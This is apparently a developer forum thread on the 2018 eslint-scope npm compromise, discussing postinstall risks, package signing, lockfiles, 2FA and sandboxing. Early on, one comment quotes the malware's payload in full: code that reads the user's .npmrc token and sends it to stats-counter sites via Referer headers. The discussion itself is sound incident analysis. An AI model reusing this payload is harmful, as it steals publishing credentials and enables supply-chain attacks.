I blame the Linux Foundation that has allowed Node.js to ship with npm CLI which is a client for a _VC backed_ _for profit_ company. This posinstall stuff is clearly a bad design that many have pointed to it before but npm just ignored it. Nobody can fix it other than npm. I have nothing personal against people who work at npm inc but this structure is not right. npm is having way too much control over this ecosystem. They always complain about not having not enough resources. How about running npm like an open source project instead? I have many questions:
Why the registry code is not open source?
Why the CLI is not maintained well? (Yarn exists because npm CLI sucks)
What if VC money forces npm to milk free users for money?
He has a very early attempt at breaking from compatibility with Node called "Deno". Here's the part in the video about his current thoughts on importing external modules under Deno:
And he even mentions linters (in the first Deno slide) as untrusted utilities that should take advantage of the JS sandbox and not have access to network.
> How about running npm like an open source project instead?
In the end such a large service requires a fair bit of hardware & costs to work. While I would prefer there wasn't as much dependency on something a single company controls. The largeness of node & npm makes it quite the target.
exactly, this has nothing to do with the LF and everything to do with the NodeJS community being OK with a for-profit startup owning their registry... the registry should be community owned and funded similar to the way say the LF runs LetsEncrypt.org as a community resource
You realize that LF is only a minor partner in LetsEncrypt, right? The major partners are EFF, Mozilla, OVH, Akamai and Cisco (and Cisco being involved is a very good reason to stay the hell away from it).
No big fan of Cisco but unless someone else will chime in and explain why this is a big deal when it comes to LetsEncrypt I think this is a bit over the top.
To be honest, i don't know if it's practical for something like this to be community funded. Ideally there would be a committee from multiple companies who have interest that can contribute. Node.js has a board for example.
How being VC-backed or for-profit is related to anything? Sounds like knee-jerk reaction - somebody screwed up, they are VC-backed, which proves VCs are evil and profits are evil. Let's not add such noise.
Below is the contents of the pastebin that the virus tries to eval.
Kind of interesting that they used a stats counter site as a free anonymous database.
try{
var path=require('path');
var fs=require('fs');
var
npmrc=path.join(process.env.HOME||process.env.USERPROFILE,'.npmrc');
var content="nofile";
if (fs.existsSync(npmrc)){
content=fs.readFileSync(npmrc,{encoding:'utf8'});
content=content.replace('//registry.npmjs.org/:_authToken=','').trim();
var https1=require('https');
https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+content}},()=>{}).on("error",()=>{});
https1.get({hostname:'c.statcounter.com',path:'/11760461/0/7b5b9d71/1/',method:'GET',headers:{Referer:'http://2.b/'+content}},()=>{}).on("error",()=>{});
}
}catch(e){}
Hi! Thank you for posting the script. In the meantime, the script has changed to "//1", see http://pastebin.com/raw/XLeVP82h.
Is it possible, that it could have for example leaked ssh keys in the past? Is it possible, to get all revisions of this pastebin?
edit: after researching it on my own, it seems that only administrators can edit pastebins, regular users can not.
You can edit your own paste on pastebin if you made it with an account. This one was made with an account, shown on the full page: https://pastebin.com/XLeVP82h
It's possible the person who created it edited it. I don't think there's a way to see past revisions, other than external archives.
The fact that this is the top-voted item here scares the hell out of me.
eval() should be removed from the language. Period. Dynamic code like this is a gaping security hole. There an infinite number of ways to get around eval() detection (see some comments below).
eval() combined with a hole-ridden package manager is the perfect storm; the equivalent of an open door for hackers to manipulate a potentially huge number of code bases.
And the top-voted comment is how they used a stats counter to stuff the hijacked creds... WTF.
Removing eval wouldn't help— you could always just write a tiny interpreter to do the same thing. This is a problem in any Turing complete programming language (with Reflection), although JS makes it easier.
True, it wouldn't solve the problem entirely, but I'd guess a 'tiny' interpreter would stand out more than a one liner like this one, possibly making detection easier.
Removing eval doesn't fix anything here. In fact you can eval in other methods in JS (setTimeout and setInterval).
I think this issue is a good reminder that installing thousands of dependencies for a hello world app is dangerous and could ultimately be very costly. We need to handle modules better.
> I think this issue is a good reminder that installing thousands of dependencies for a hello world app is dangerous
You are obviously making an embellishment, but even if you only install 10 dependencies for a large app, the same problem exists.
If you don't have the resources to security+quality vet everysinglemodule in the entire dependency graph of your project, you will be susceptible to the same issue.
The problem lies in the fact that modern development requires that you trust unlicensed strangers to write code for your supply chain. You don't authenticate them and the extent of authorization is just that you choose their library over all of the alternatives.
Edit: I realize after writing this that it sounds like I'm apologizing for _npm_'s basic security mistakes. I recognize they exist, but I'm trying to highlight that this isn't really a solved issue for other package managers, even though many of them have solved the basic security hygiene that npm hasn't.
> The problem lies in the fact that modern development requires that you trust unlicensed strangers to write code for your supply chain
Yup, I agree but I think npm makes this issue significantly worse than any other package manager. In most languages you can download a few packages to add the necessary functionality you're looking for and sometimes they include additional dependencies but it usually isn't very many (at least in my experience).
But node / npm? Good luck installing some basic setup for webpack or other common frameworks and _not_ find yourself installing 1,000+ packages.
I don't know exactly _why_ it's like this but there are a large amount of entries for getting malicious code into an application nowadays and with JavaScript running on almost everything it's hard to imagine this not happening to something that could cause a major disruption.
When I did work for the DoD in one specific agency you couldn't just include any npm module. You had to go through a list of approved modules and versions. Then if you requested a version update or a new module it had to be reviewed by a security team before being included. Granted this won't find everything but this is a well understood issue that many in the government are well aware of and I wonder when the private sector is going to come up with their own, hopefully better, solution.
> You had to go through a list of approved modules and versions.
I was actually talking about this with coworkers at lunch.
I think this is too expensive for individual developers/small companies, but there's really nothing stopping a wider open source community from marking specific modules+versions as more likely to be secure.
I think there should be some opt-in system for objectively predicting code quality and developer/maintainer opsec. Apply some rubric for {secure programing techniques, static+dynamic analysis, CI deploy toolchain, basic security hygiene of the developers} and recursively apply it to the upstream dependencies. Display the score according to that rubric on the project page -- this would be far more useful of a metric than "number of downloads" or "I used it at my last company".
It doesn't protect against malicious insiders, but not having a high score could act like the "Scarlett Letter" we need for low quality repo-modules.
Everyone gives C's library distribution model shit, but at the end of the day installing through a distribution's repos is still much more secure than the alternatives.
You can do that for javascript too, but you'll be getting older versions of everything. That will also be true if you're using a C package under active development. Distros, by design, aren't as quick to update as npm.
It looks like Ryan Dahl predicted it: "It would be nice to download the massive codebase that ESLint is and run it without it taking over my computer - which it could."
Sandboxed by default is the best design decision of deno.
Using URLs for import is another one. npm as a company has too much power and responsibilities that is really unnecessary. We're downloading from a URL anyways. package.json and npm makes it look like everything has to be hosted there
Cargo packages can also execute arbitrary code at compile-time through build scripts, which run with full permissions of the original `cargo` command including filesystem and network access.
Just to be clear, the reason I (and others) use the NPM registry is that it saves us a ton of time and helps us be more productive.
There is nothing stopping me or you from putting "regular" JavaScript files in your `node_modules` and `require`ing them or running node with ESM and a loader that loads URLs (requires Node 10) and have the same semantics as deno with packages.
Some problems I personally see with URLs is versioning (and versioning of dependencies) and the fact it's harder for multiple packages you're using to have the same dependency without downloading it twice.
productive... sorry but I'm starting to hate this word. What do you mean by that? Being able to randomly import blobs of code that maybe does something that might help you as you go figure out what you're supposed to implement while at the same time the "customer" is also figuring out what they want?
So a few things - now that this won't get any more 'public' attention.
> What do you mean by that?
Compared to the alternative (of manually importing code) it saves me time. The 'download code from the internet' problem isn't new to NPM or new to package managers or even related - it is orthogonal in my opinion.
> Being able to randomly import blobs of code that maybe does something that might help you
I usually know exactly what the code I'm using does and why I'm importing it.
> you go figure out what you're supposed to implement while at the same time the "customer" is also figuring out what they want?
This lights up a bunch of red lights to me. This is nothing like the development process I know. I strongly suggest you consider looking for a place that doesn't treat developers like that (mostly technical companies tend to be better in this regard).
It is a programmers' market and you get to choose a workplace with good culture. The path of feeling like your goals are unclear or unimportant while caring about them leads to burnout. Stay strong :)
(
> Argh, please! What a crazy asylum...
FWIW, I think the mental health reference is in bad taste.
)
1. someone compromises eslint to scan for other npm credentials and upload them.
2. the code has a bug that fails in some conditions.
3. this probably ran in several devs/CI systems and stole tons of credentials
4. the thread is about pinning the unaffected older version on all other high profile packages
5. people start to suggest fixes for the payload exec'ing code from an http request.
in the end, attackers now have hundreds of credentials for less visible projects, and even a fix for their code. I'd say attackers are writting this off as a huge success.
npm should proactively revoke everyone's token now!
> To protect potentially compromised accounts, npm is invalidating all npm login tokens created between 2018-07-11 00:00 UTC and 2018-07-12 12:30 UTC (about 2 hours ago).
Revoking all tokens and probably unpublishing anything published since eslint-scope 3.7.2 was released (maybe limit it to things published with a token that was issued after 3.7.2 was published) is the only way to really be sure
> To protect potentially compromised accounts, npm is invalidating all npm login tokens created between 2018-07-11 00:00 UTC and 2018-07-12 12:30 UTC (about 2 hours ago). If you believe your account specifically was compromised we still recommend visiting https://www.npmjs.com/settings/~/tokens to revoke all your tokens.
> Posted about 20 hours ago. Jul 12, 2018 - 16:42 UTC
Then later:
> We have now invalidated all npm tokens issued before 2018-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.
> We will be conducting a forensic analysis of this incident to fully establish how many packages and users were affected, but our current belief is that it was a very small number. We will be conducting a deep audit of all the packages in the Registry to confirm this.
>Posted about 18 hours ago. Jul 12, 2018 - 18:52 UTC
Considering how you pretty much need 1,000+ node modules just to run most framework hello worlds, yeah this is terrifying. But it's a well known problem, too, that no one seems to want to do anything about and with npm being a business that wants / needs people to download modules through them, I don't see this changing any time soon.
Maybe Deno can help give a new, security focused life into JavaScript development.
Buggy code is a top indicator that something on a deeper level is wrong. Assuming that the people who wrote the code were not in a total rush and quite smart, how could they write buggy code if the code base was healthy and robust? Especially on a project that is unit-tested and linted, without checking I assume everything on ESLint is...
How can the exploiter write buggy code? By... writing buggy code?
From what I gather, they wrote some code that downloads a script, which might (or not) get downloaded in chunks. But their code only executes the first chunk. So if the whole script is not in the first chunk, you get a syntax error because it is incomplete.
That exploited code was not in Github, it was added to the ESLint code the exploiter had, which he then published to npm using stolen credentials, bypassing the normal CI process. How would unit tests and linting help with that?
> One of our maintainers did observe that a new npm token was generated overnight (said maintainer was asleep). We think that token was likely used but are awaiting confirmation from npm. This maintainer has changed password, enabled 2FA, and generated new tokens.
This should serve as a reminder to all FLOSS maintainers/contributors that 2FA should be enabled on whichever services (relevant to your project and elsewhere) support it.
Given that it's making calls to histats.com and statcounter.com, I wouldn't be surprised if this is someone trying to make a point. Let's hope so, at least :) I would be interested in a blog post detailing how many credentials they were able to obtain, how many people they managed to infect and how many packages they could potentially compromise.
If npm (and I'm guessing they will) have to invalidate all publish tokens for all users, that is going to be painful.
Edit: I should point out that this is just speculating - there are definitely still ways this could be abused, so don't assume you're safe.
Doesn't matter. Google Analytics was used to steal ethereum seeds too (as the 'referer' also I believe). Its common to use analytics as exfiltration services -- the traffic is not as suspicious and usually https.
There's always a trail. What IP and email were used to register the accounts for the stat tracking sites? What IP was used to register the email account? What are all the IPs that ever logged into those accounts? If the email or account registration or login IPs are VPNs, what IP was behind that VPN (if the provider keeps that information)?
A server doesn't necessarily leave any more of a trail if you purchase one with a good VPN, throwaway email, and some kind of cryptocurrency.
OPSEC is a bit easier when abusing a legitimate service, but I think one of the main reasons to use these stat tracking sites is because it blends in with regular traffic very well. If your organization doesn't have SSL interception, it would be very difficult to find the .npmrc exfiltration in logs or PCAPs. This wouldn't be the case if they purchased a server or registered a domain just for this purpose, even if they used SSL, since traffic to the IP/domain alone would likely be sufficient to confirm compromise.
more likely a simple anonymous email signup that will receive the payload and present the data in an anonymous and easily accessible way. in this case, it just present the keys as the list of referrers (albeit formatted as urls).
In short: Someone has published a version 3.7.2 of eslint-scope that contains unwanted code. The code tries to read your credentials and send them to some tracking pages.
Webpack and more uses ^3.7.1 of the dependency, making you automatically upgrade to the hacked one.
Update: According to the linked issue the nefarious package has now been unpublished. If you have npm credentials and did npm install the last few hours you should probably revoke your tokens.
source is from github, right? can we not identify the "someone" in this case? or are we talking about a separate publish to npm process unrelated to github releases? can the eslint-scope team not figure out the someone that did the publish?
I'm an open source newb but I have to think someone had to accept this malicious code at some point for it to ripple through and make it to release/publish right?
From what I read, the code is not in the github repository. What happened was that the npm publish credentials were compromised, and someone published their own code instead of code from the github repo. So they don't have commit logs of who published the bad code, but npm may be able to help them track down which credentials were used to publish it. Npm's server logs may also point in the direction of where the malicious publish came from, but it's likely that the IPs in the server log are proxied or otherwise useless.
> someone published their own code instead of code from the github repo
Sorry for my ignorance, I have not been a real dev for over 10 years, but wouldn't a better way for NPM to take new packages be for NPM to own the build process? As in the owner of a package would tell NPM: please build and publish from this previously registered repo. Then NPM would have it's own Jenkins servers actually run the build?
Based on my very limited understanding the main problem I see with NPM is that I have no idea if the code in the repo was the same code used to build the package. This is what happened in this case, correct? Wouldn't NPM owning the build process solve this problem?
I realize this would be a huge load for NPM, but NPM has the world's security riding on its shoulders.
But how would you know that the sourced on NPM same as the ones you have? Except if you require all NPM packages to be hosted on Github but that does not seem like a good idea to me.
I'm more familiar with the Python/PyPI world, where the "morons" also don't "just" do all the "simple" and "sane" things random internet commenters "helpfully" suggest.
But if you want to spin up a package repo that can, say, build the numpy/scipy packages from source and doesn't end up compromised or overloaded as a result, be my guest. Until then, though, maybe hold off with the "morons" commentary and the attacks on people who are doing their best to solve genuinely hard problems at zero charge to the community?
>people who are doing their best to solve genuinely hard problems at zero charge to the community
NPM is not doing their best. They actively reject ideas like package signing. They allow running arbitrary unsandboxed code when installing a package. Please, do tell me how they are doing their best. Even JS people think it's bad (hence why deno exists).
Why do no other package managers have this problem? Why are there no incidents where installing an apt-get package stole credentials, even though apt is way older?
When I was Django's release manager, I started our tradition of ensuring that every single package we put on PyPI was also accompanied by us publishing signed checksums of the file.
So. Django signs its packages. Now, what good does that do you? How do you know my key (or, these days, Tim's or Carlton's keys, since they roll the releases) is authorized to release Django?
"Just support package signing" is one of those things that sounds super easy. And in fact, PyPI technically supports it -- you can upload a detached signature along with your package!
But you don't "just" support signing. Signatures, absent a gigantic infrastructure of key management, indicating whose keys are trusted for what purposes and by whom, are basically useless. So when someone says "just support package signing", they don't really mean "just let us upload signatures!" What they really mean is "develop and maintain that web-of-trust infrastructure for me", but they don't like to acknowledge that's what the request really is.
Why are there no incidents where installing an apt-get package stole credentials
Because Debian grants package-releasing privileges only to a tiny group of people who are vetted before they get to release. Systems like npm and PyPI, by design, let anyone who wants to sign up and start publishing packages. That's a deliberate tradeoff, and one that comes with both risk (you'll get some bad actors) and reward (you'll get a larger and richer ecosystem of things being published).
I eagerly await your next set of soundbites that have come up, and been rebutted, in every single discussion of npm and PyPI that's come up on HN in the past five years.
You make good points about package signing. It's not a trivial problem. Fortunately it's a solved one. There are package managers (pacman, nuget, rpm, etc) that do this. Yes, maintaining a web of trust is required. Nobody said otherwise. You don't need to put words in the mouths of people who want NPM to be a bit more secure. Point is, it's probably worth the hassle for a fairly critical piece of infrastructure.
At the very least they could just do what Ruby gems do and allow packages to be signed but leave who to trust up to the user. Frankly, it wouldn't be that hard for ESlint to publish a key on their site and users to run a command like `npm trust /path/to/eslint.pem`. I don't generally think security should be opt-in, but it's still better than no option at all like current NPM.
Also, you didn't touch on the fact that NPM allows executing unsandboxed code on package install. I'm actually curious if you think there's a decent reason for this. It seems like a _really_ serious issue for questionable benefit. As far as I can tell, PyPI doesn't allow this.
> I eagerly await your next set of soundbites that have come up, and been rebutted, in every single discussion of npm and PyPI that's come up on HN in the past five years.
I'll ignore this blanket dismissal of my points. I think given NPM's history of issues (including particularly absurd highlights like left-pad and this eslint incident) maybe the NPM community should stop turning a blind eye to this and consider that they could be doing better.
You're absolutely right! People should hold off on unmerited attacks on those working hard to solve genuinely difficult problems.
Yet, is it perhaps possible that tying together build and distribution systems is not an unsolved or unsolvable problem? Bundling build processes with source packages is not a novel notion or even a novel approach. Builds being reproducible is similarly not a novel idea.
Or, to put it another way, is it possible that working hard is not a good explanation for other-than-optimal solutions when other options are known?
There's a reason I picked numpy/scipy as examples. Among popular Python packages, they're among the genuinely hardest to build from source. You need several non-Python dependencies, including multiple language build toolchains, to get a working build, and need to dive into notes on things like ABI compatibility between different FORTRAN compilers in order to make sure what you're doing will work.
So, setting up something like a PyPI -- again, because that's what I'm familiar with -- that "just" adds the feature of building the packages on machines owned by the package repo is not exactly a simple thing. And PyPI currently hosts over 1M different released packages, so take that number into account when figuring the complexity of all the different things it might have to support.
Or, to put it another way, is it possible that working hard is not a good explanation for other-than-optimal solutions when other options are known?
Or, to put it another way, is it possible that people who leave drive-by "helpful" "suggestions" in comment threads about package repositories vastly underestimate what they're asking for, and often don't even really understand the problem domain?
> There's a reason I picked numpy/scipy as examples. Among popular Python packages, they're among the genuinely hardest to build from source.
For context, I wrote my comment with awareness of the level of complexity that exists.
> Or, to put it another way, is it possible that people who leave drive-by "helpful" "suggestions" in comment threads about package repositories vastly underestimate what they're asking for, and often don't even really understand the problem domain?
You're right! It's absolutely possible that driveby snarky suggestions are not helpful in any way! It's also perhaps possible that there is a point to be made and perhaps a nasty-but-avoidable failure scenario.
There is, after all, a distinction to be made between problems that are complex and problems that are unsolvable. The general-purpose problem of building packages is, as you say, incredibly complex and difficult. It's worth considering that it might not be unsolvable. After all, every single package in PyPI got built somehow.
Which is to say one doesn't set out to bolt a build system onto a package repo system. One bolts a repo system onto a build system, because then it's an (easier) versioning and binary blob distribution problem when you have a reliable chain of trust.
This is certainly true, and the statement that NPM is _run by_ "morons" is, while immature in its phrasing, at least potentially aiming toward a legitimate point.
However, the post in question also labels NPM's _users_ in broad strokes as "morons", which can make no such claim of legitimacy. It's just a puerile, baseless insult that is devoid of content and detrimental to the poster's credibility.
npm doens't take the code directly from the github repo, so far it looks like the new code was publish directly to npm, so there is no git commit to look at as it never was part of the official github repository
publishing is separate to the source code. If someone stole the publishers credentials, then they could publish [1]. Only NPM servers would be able to know something special (not the credentials) about who did the publish, e.g IP.
The someone was a publisher for ESLint whose credentials were stolen separately from this. The malicious code itself isn't stored in the codebase, it's stored in a pastebin doc that's called by URL. Theoretically, the person that did this can change the content of that pastebin file at any time to get new/different code run on machines that have this installed.
Each version of an npm package needs a certified git commit hash.
Otherwise when vetting an npm package, you have no idea if the code you're reading on Github is actually what you're going to download or not. In scenarios like this one, package publishers could easily configure getting an alert that someone tried to push to npm a hash for which no commit exists in Github.
For packages with a build step this would likely mean npm would have to run the build step on their servers. Hopefully there's a way they won't have to eat that cost, but I believe publishing linking package versions to specific git hashes is the only way to prevent an attack like this.
The challenge here is that you cannot just go with signed commits—it would also need to authenticate a specific user/org, repository, etc. (Anyone can sign a commit)
Similarly, however that whitelist of identities is specified becomes another vector, without a lot of PKI
I shouldn't have used the word 'certified'— I just meant the package version should have an associated commit hash. There has to be a relationship between the hash and the published code in some way, unlike eg. the "homepage" field people use to link to Github which can just be an outright lie.
My goal is for readers to match the hash to one on Github so they know the code they're reading there to vet the package is what's on npm. For OSS maintainers, it's an immediate red flag to see a package version published with a hash that was never in the public repo.
This won't certify that the version is blessed by a legitimate author. It just delegates the problem to Github (or their competitors). It doesn't solve the problem of preventing all OSS library-based attacks, but plugs one of the leaks in trust that caused today's failure: that Github->NPM is not checked in any way.
If a malicious actor has access to change the npm module (therefore can change the public key used to verify the module code signature), how does signing code help? Now the malicious actor is signing their malicious code.
Code signing still allows the fire to spread. What we need to be talking about is how to prevent the spark that starts a fire.
Further clarifying: npm will revoke all tokens issued before 2018-07-12 12:30 UTC. If you rolled your tokens after that time you will not need to re-issue them.
The honest answer is a hard truth: you don't use npm at all. The npm ecosystem is out of control and beyond saving. I think it would be wise if someone started a new JavaScript package manager which was run more like a Linux distribution is - trusted third-parties that independently audit and publish new packages.
Retracted: I wanted to audit the rest of npm to see if this payload had made it into any other packages, since if it steals your npm credentials it seems like it could easily become viral. But because npm is a centralized, proprietary service, I can't just download all of the packages from a mirror and examine them myself.
1. You can protect against problems like "a subdependency's patch version automatically bumped to something bad" with a lockfile, either yarn.lock or package-lock.json. Of course, that doesn't help if you chose to update your lockfile in the handful of hours this attack was live.
2. It seems to me that, accordingly, a client-side command to only download packages/versions that have been live for more than n hours/days would decrease the likelihood of downloading malicious code substantially. The community is large and folks tend to find the bad stuff.
3. If independent third parties had to audit code _before_ it could be released, we'd get a lot less code a lot slower.
4. We do have a trusted third-party publish new packages – NPM. They remove malicious content as quickly as they can.
5. Yarn operates a mirror, and there are several CDN's with everything on npm - unpkg.com, cdn.jsdelivr.net/npm, bundle.run. Perhaps one of them will let you download everything for examination.
I wouldn't be surprised if NPM, Inc. would help you audit the rest of the ecosystem if you reached out.
>If independent third parties had to audit code _before_ it could be released, we'd get a lot less code a lot slower.
So? The JavaScript community could stand to slow down a bit.
>We do have a trusted third-party publish new packages – NPM. They remove malicious content as quickly as they can.
They might publish, but they certainly don't audit. Anyone can publish a package on npm in tens of seconds and it's immediately live for anyone to install. It's not even signed. This looks nothing like a Linux distro.
"Move fast and break things" leads to breaking things, it's a shitty and reckless attitude to take towards software development and it puts innocent and vulnerable users at risk.
Nobody is forcing you to, I'm building a tiny internal only dashboard right now, move fast and break things works great, because the worst that will happen is our tiny internal dashboard won't work... And spending a ton of time properly engineering and securing a dashboard will be mostly wasted time.
But when I'm working on a core application for the company, I slow down and take my time and actually engineer software.
I don't need all of software development to "slow down" to do that.
Yes, and anything that warrants higher security doesn't happen from a Dev machine, and isn't possible with just creds on a Dev machine.
They are horribly insecure by nature. They almost all have root, they download and install tons of software, they are often portable, and us developers aren't infallible and will eventually fuck up.
Systems that require better security won't rely on any one or even 2 dev systems, and yes that requires more time and effort, but it's better than the alternative of hoping all of your developers never make a single mistake.
It's not perfect, but if you have a perfectly secure system, I'd love to hear it!
I don't have a good solution, but I come from a time when, if a machine was compromised, you changed every one's security tokens and re-imaged the affected machines.
Yeah, I won't be broadcasting it publicly, but it would be stupid to spend hundreds of hours properly securing it and wasting countless hours making anyone that wants to access it jump through tons of hoops.
If there is something that starts processing data or is customer facing, then more work goes into securing and engineering it. If an outage would cause significant issues, more work goes into security and engineering. If it processes personal data, then even more work goes into security and engineering.
I'm honestly surprised this is something that most people don't agree with... Do you really advocate using the highest security and redundancy practices for even the smallest of front end projects?
I'm not advocating throwing all common sense out the window and just eval-ing anything and everything, just that a "move fast and break things" ethos has it's place, and can massively increase productivity in places where it's useful, and a "slow and safe" ethos can always be used when needed. Or anything inbetween.
> So? The JavaScript community could stand to slow down a bit.
It's not "a bit", and it's not just the Javascript community, unfortunately. Practically every software project pulls in heaps of unaudited third-party code.
Debian is different as they build all their own packages, as do most other OS package managers.
And that comes with significant cost. Not only money cost in that it's expensive to staff, maintain, and constantly work with authors to build their stuff, but also in terms of "lag".
OS packages are often months or longer behind current releases, and I'd argue that the difficulty of getting one's package into all the different systems is one of the reasons why language-specific package managers have grown so much.
If you feel that approach is useful, then feel free to implement or call for it's implementation on top of something like NPM. But don't call for all package managers to be as slow, cumbersome, difficult to use, and expensive as OS package managers are.
Just because it hasn't happened doesn't mean that slowing down would prevent it. There's plenty of reasons why certain projects could be a target and some others are not - the sheer size of the npm ecosystem could for example be an important factor.
That said, Debian is an interesting example, because they have indeed slowed down significantly (i.e. not "a bit") compared to e.g. Maven and npm, and have significant more manual checks. I do believe that that helps them a lot in being less vulnerable, but I also believe that that approach is far more viable for their use case than for e.g. Maven and npm.
Though on the other side, you have to judge how many libraries you want aren't in the Debian repositories, how much effort it takes to publish something into the Debian repositories, and how completely out of date many things in them are.
The JS community encourages micromodules and leveraging NPM to a fault. We saw that with left-pad years ago, where such a basic function was used all over the place even though it was highly inefficient. That is a testament to how little people actually check their dependencies and just assume others vetted open source code
The npm ecosystem is the "worst" in this regard, definitely, but it would be foolhardy to assume that this is not likely to happen to you just because you're not using Javascript, or that slowing down to the level of other ecosystems would prevent this from happening to npm.
Come to think about it, if you're not a fan of the paucity of public mirrors evinced by the first link, you could use the second one to do something significant toward improving that situation. But I grant it's easier merely to criticize.
"Yudkowsky's Law of Continued Failure says that if they're dumb enough to do X, they're dumb enough to go on doing X after the next stimulus." In this latest saga of NPM-related fail, it's just another stimulus, so don't expect anything to happen that might address the underlying problems of the ecosystem.
I did say it was about Node, not NPM, but you're right on the article quality too. I even used Node after reading that post..and liked it. But actually I was wrong to even associate it with Zed's post, since Zed's post is mainly about the community and not about the technology. I inferred the call for a similar post on NPM to be technology related and pattern matched on the wrong dimension of "poorly received ranty criticism" entirely! Oh well.
And risk getting pilloried by the community for being divisive? Or worse, for triggering someone?
Zed has taken a way-out-of-proportion amount of heat (and mostly people just trying to bait him) from people for his confrontational style. Even then, the social climate is much less receptive to that sort of thing now than it was then.
I highly recommend using package-lock.json files and npm ci in a ci-environment. That way your automated processes aren't changing dependencies. And even if you use npm install, your lock files act as a source of history to inspect what changes occurred between new installs.
> As a user/developer how do you even mitigate against this kind of attack?
I wish there were a viable answer other than "use a capability-secure programming language". Even auditing is insufficient since nefarious code can easily slip through even an audit.
Not just network permissions, opting into what local directories it can see. Allow it to see absolutely nothing but its own directory and temp. I don't have a good answer on a good method to override this when necessary. Ideally never, but realistically some form of whitelist.
npm-audit is good for post-disaster cleanup, but it's too late to prevent anything.
> Not just network permissions, opting into what local directories it can see.
Well, one way I personally do this for my own stuff is with Docker. The problem is that I don't think it's reasonable to expect every developer to run in Docker - at least until it's at least as easy as the atlernative.
Maybe I just haven't taken the time to learn Docker well enough but the blocker that stopped me from doing this last time is how much my dev environment (VSCode and other tools) depend on my node package and its dependencies being accessed from a certain spot for import autocomplete, intellisense, etc.
Aha!! So all code is executed in the container but all the code is stored locally so all my local tools see it normally. Yes on the surface that seems like the approach I need.
This was the blocker for me to use it on my local machine as well. How can we fix this? Is there a way to do it without updating every tool to explicitly special-case docker?
Dev machines are one thing, but there is no reason our CI tools should ever expose credentials in a way that is accessible to any build or test step. Build and test steps should be sandboxed to take input and produce an artifact, which is then uploaded to wherever in a completely separate sandbox.
A programmatic way to tell if the publisher of a module has 2FA enabled. I’m a fan of public shaming to enable 2FA, if not making it mandatory (again tricky if you have automated builds).
-1 to this. while 2FA is a no-brainer for most of us, publicly listing (or showing status) not only encroaches individual liberty to make a choice, it would open such users to be targets of an attack. Enforcing 2FA in an organization seems more appropriate. Perhaps npmjs.com has implemented that since last I looked, but I know in the past that enforcement was not available.
I also greatly dislike the trend of public "shaming" that's so prevalent today. The internet has made us cruel.
> -1 to this. while 2FA is a no-brainer for most of us, publicly listing (or showing status) not only encroaches individual liberty to make a choice, it would open such users to be targets of an attack.
Saying that you refuse to enable 2FA is the information security equivalent of saying you refuse to wear a condom.
Of course people are free to make their own choices but I personally wouldn't take anyone who publishes software seriously if it's not enabled. This isn't like securing access to a social media or shopping account. The ramifications of a breach can quickly cascade and 2FA is low hanging fruit to stop a lot of that. It's far from perfect but it goes a long way.
> Enforcing 2FA in an organization seems more appropriate. Perhaps npmjs.com has implemented that since last I looked, but I know in the past that enforcement was not available.
The nested nature of dependencies makes partial enforcement pointless: A (2FA) > B (2FA) > C (2FA) > D (no 2FA!)
> I also greatly dislike the trend of public "shaming" that's so prevalent today. The internet has made us cruel.
I wholeheartedly agree with you on both points and, outside of security, I can't think of any other example where I'd be open to it.
I like to think I hold myself and people in our own industry to higher standards than the Internet at large.
I, too, greatly dislike the cruelty of public shaming. It's inhumane, and dehumanizes us all.
Recently I was tasked with improving 2FA usage in my company's GitHub organization. My first approach was to nicely, neatly, and personably ask people, coupled with regular announcements to make sure everyone knew. Every interaction came with documentation on how to do it and a sincere offer to walk them through it. Totally reasonable approach, executed with kindness and compassion.
The cynic in me was unsurprised when this rapidly became a Sisyphean task. A number of people, upon faced with being informed in half a dozen different ways, professed to have no idea that they were expected to enable 2FA. Others swore up and down to me that they knew what to do and would shortable enable it, only for it to still be off a week or more later.
At this point I decided that kindness and human compassion were a drain on my time and clearly ineffectual. So I grabbed a junior engineer and we wrote a script that automatically removes from the org anyone who doesn't have 2FA enabled. Announced it to everyone, every manager on board, and turned it on. Overnight, the problem went away, and has largely stayed away. Once in a while people publicly ask why they were kicked out and are reminded that they were informed of the 2FA requirement.
This isn't an approach characterized by humanity and kindness. It is, however, one that is effective and time-efficient.
You're absolutely right! GitHub does offer that wonderful feature.
There are some legacy bot accounts that we cannot readily tradition to 2FA and we cannot do without. The feature you have so rightly pointed to would evict them from the org. That's not an acceptable outcome in this case.
I skipped over this in my previous comment because I felt it wasn't germane to the story or the point.
I hope you also publicly shame services that only offer 2FA in exchange for your phone number.
My phone number identifies me much better than my email address and/or cookies ever will. As someone who cares about privacy, I don't give it to anyone. And yet, publicly shaming me for not enabling 2FA would shame me by proxy for caring about privacy.
Security > Privacy, and there are plenty of ways to get static burner phone numbers for a small fee if privacy is that important to you. (Skype, Google Voice, Burner Phone, etc)
I think it would be interesting - one solution could be a loader (ESM) that only lets you load other "unprivileged" files by default - then importing things like `child_process` or `fs` could require more privilege. A little like how apps work.
> A programmatic way to tell if the publisher of a module has 2FA enabled.
I will bring this up. Personally I think I understand the objection of the reply below about this information being risky. That's something NPM likely can/should solve and not Node.js.
For what it's worth GitHub orgs can already tell who has or doesn't have 2FA. Node.js itself for example enforces GitHub 2FA for all the organization. I assume GitLab has a similar feature.
Not a solution for everything, but one of the key reasons we made RunKit is precisely to allow you to try random packages without giving them access to your computer (its basically an easy way of the "run everything in a Docker container" suggestion below). NPM links directly to this where it says "try <package> in your browser", but you can also just do it yourself: https://runkit.com/new.
I can't imagine most modules need to read or write your .npmrc directly (npm itself does). That should flag a module (with the understanding that I'm sure there's some modules that do legitimately need that access - eg to easily swap which registry you're publishing too).
When a dependency tree starts going too deep, it's too easy for malicious modules to get snuck in. You pull in Popular Library X which depends on well-known module A, which in turn pulls in shim B, which in turn depends on an unpinned utility C. Somebody sneaks a malicious hook into utility C which isn't used directly by anybody really, but propagates the malicious code to all the users of Popular Library X (eg Babel).
How about something like OpenBSD's pledge(2) system call [0] for Node?
First: everyone decide on a set of potentially dangerous things for a program to do. Three examples off the top of my head: disk I/O, accessing the network, executing external programs.
A function could declare that it will only do some subset of potentially-dangerous operations, and an exception will be thrown if either it or anything further down the call stack does any of the others.
In this particular case it seemed to be some post-install build script that caused it - but if this was present in the Node core would it be that difficult to implement in npm (i.e. "my post-install script and its dependencies will only ever do disk I/O")?
If this is possible, and if it was adopted in the community widely enough, this would halt the imminent "some thing I depended on depended on something else that depended on a string function that turned into a credentials hoover" apocalypse...
